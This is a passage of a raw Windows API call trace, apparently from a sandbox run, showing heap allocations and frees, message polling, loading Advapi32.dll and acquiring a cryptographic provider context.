hHeap=0x970000) returned 1 [0249.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0249.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51460 [0249.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0249.318] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0249.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0249.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0249.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0249.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0249.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0249.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0249.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0249.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0249.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0249.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0249.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0249.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0249.319] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0249.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0249.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0249.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0249.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0249.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0249.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0249.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0249.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0249.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0249.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0249.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0249.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0249.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0249.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0249.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0249.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0249.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0249.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0249.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0249.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0249.320] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0249.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0249.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0249.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0249.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0249.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0249.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0249.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0249.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0249.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0249.320] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0249.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0249.321] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56098 [0249.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0249.321] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0249.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56098 | out: hHeap=0x970000) returned 1 [0249.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0249.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0249.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c38 [0249.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0249.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0249.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0249.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0249.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51520 [0249.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0249.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0249.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0249.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0249.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0249.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0249.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0249.321] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0249.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0249.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0249.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0249.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0249.322] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0249.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0249.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0249.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0249.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0249.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0249.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0249.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0249.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0249.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0249.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0249.324] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0249.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0249.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0249.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0249.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0249.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0249.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0249.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0249.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0249.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0249.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0249.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0249.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0249.325] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0249.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0249.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0249.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0249.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0249.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0249.326] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0249.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0249.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0249.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0249.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0249.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0249.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0249.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0249.327] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.327] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0249.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55dc0 | out: hHeap=0x970000) returned 1 [0249.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0249.327] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0249.327] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0249.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0249.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69988, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0249.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0249.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0249.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0249.328] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0249.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0249.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0249.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0249.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0249.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0249.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0249.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0249.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69b08 [0249.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0249.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0249.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0249.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0249.329] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0249.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0249.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0249.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0249.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0249.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0249.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0249.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0249.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0249.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0249.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0249.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0249.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0249.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0249.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0249.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0249.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0249.330] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0249.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0249.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0249.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0249.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0249.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0249.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0249.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0249.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0249.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0249.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0249.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0249.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0249.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0249.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0249.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0249.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0249.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0249.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0249.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0249.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0249.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0249.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0249.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0249.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0249.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0249.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0249.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0249.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0249.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0249.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0249.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0249.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0249.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0249.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0249.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0249.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0249.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0249.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0249.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0249.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0249.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0249.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0249.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0249.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0249.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0249.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0249.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0249.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0249.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0249.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0249.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0249.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0249.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0249.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0249.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0249.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0249.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0249.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0249.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0249.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0249.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0249.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0249.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0249.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0249.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0249.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0249.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0249.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0249.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0249.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0249.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0249.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0249.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0249.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0249.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 